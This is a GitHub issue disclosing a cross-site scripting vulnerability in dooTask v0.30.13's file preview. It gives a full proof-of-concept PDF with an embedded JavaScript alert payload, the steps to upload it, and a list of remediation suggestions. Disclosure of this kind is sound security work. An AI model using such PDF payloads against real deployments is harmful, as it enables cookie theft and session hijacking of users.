Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Dootask has a cross site scripting vulnerability #210

Open
Lianghao-Chu opened this issue May 4, 2024 · 0 comments
Open

Dootask has a cross site scripting vulnerability #210

Lianghao-Chu opened this issue May 4, 2024 · 0 comments

Comments

@Lianghao-Chu
Copy link

1. Test environment
The testing environment is Windows 10 Home Chinese version
The version is as follows:
1
Test version: dootask demonstration environment; dootask v0.30.13

2. Vulnerability Description
dooTask is a lightweight open source online project task management tool that provides various document collaboration tools, online mind maps, online flowcharts, project management, task distribution, real-time IM, file management, and more.
dooTask v0.30.13 and below have a cross site scripting vulnerability. The vulnerability stems from the lack of effective filtering and escape of user provided data by the application, and the system provides file upload and online preview functions. Attackers can exploit this vulnerability by injecting carefully designed payloads to execute arbitrary web scripts or HTML.

3. POC
3.1 Function points
File - Upload File - Click to View
3.2 XSS vulnerability hazards
After a successful attack using XSS code, malicious users may gain high privileges. XSS vulnerabilities mainly pose the following hazards:
(1) Stealing various user accounts;
(2) Stealing user cookie information and impersonating the user's identity to enter the website;
(3) Hijacking user sessions and performing arbitrary operations; Refers to operating the user's browser:
(4) Streaming display, executing commercial advertisements:
(5) Spread worms.
and so on
3.3 POC process
We first write the following code into a text file, and then modify the file suffix name to pdf, where we name it joy. pdf. The following code can execute XSS attacks, and when the attack is successfully executed, the user will receive an XSS pop-up window. Afterwards, upload the file to the system through the function points and view it.

%PDF-1.3
%忏嫌
1 0 obj
<<
/Type /Pages
/Count 1
/Kids [ 4 0 R ]
>>
endobj
2 0 obj
<<
/Producer (PyPDF2)
>>
endobj
3 0 obj
<<
/Type /Catalog
/Pages 1 0 R
/Names <<
/JavaScript <<
/Names [ (0b1781f6\0559e7f\0554c59\055b8fd\0557c4588f0d14c) 5 0 R ]
>>
>>
>>
endobj
4 0 obj
<<
/Type /Page
/Resources <<
>>
/MediaBox [ 0 0 72 72 ]
/Parent 1 0 R
>>
endobj
5 0 obj
<<
/Type /Action
/S /JavaScript
/JS (app\056alert\050\047xss\047\051\073)
>>
endobj
xref
0 6
0000000000 65535 f 
0000000015 00000 n 
0000000074 00000 n 
0000000114 00000 n 
0000000262 00000 n 
0000000350 00000 n 
trailer
<<
/Size 6
/Root 3 0 R
/Info 2 0 R
>>
startxref
445
%%EOF

3.4 POC results
3

2

4. Repair plan

  1. It is recommended not to enable the online viewing function of PDF and HTML. Click to directly view the source file
  2. Update PDF Reader: Update the version of the PDF reader in a timely manner to obtain the latest security fixes and vulnerability patches.
  3. Restrict the source of PDF files: Download PDF files only from trusted sources to avoid downloading and opening unknown or suspicious PDF files.
  4. Use security reader plugins: Install some security reader plugins that can provide additional security protection and vulnerability detection functions.
  5. Regular review of PDF files: Regularly review downloaded PDF files and delete files that may contain malicious script code.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant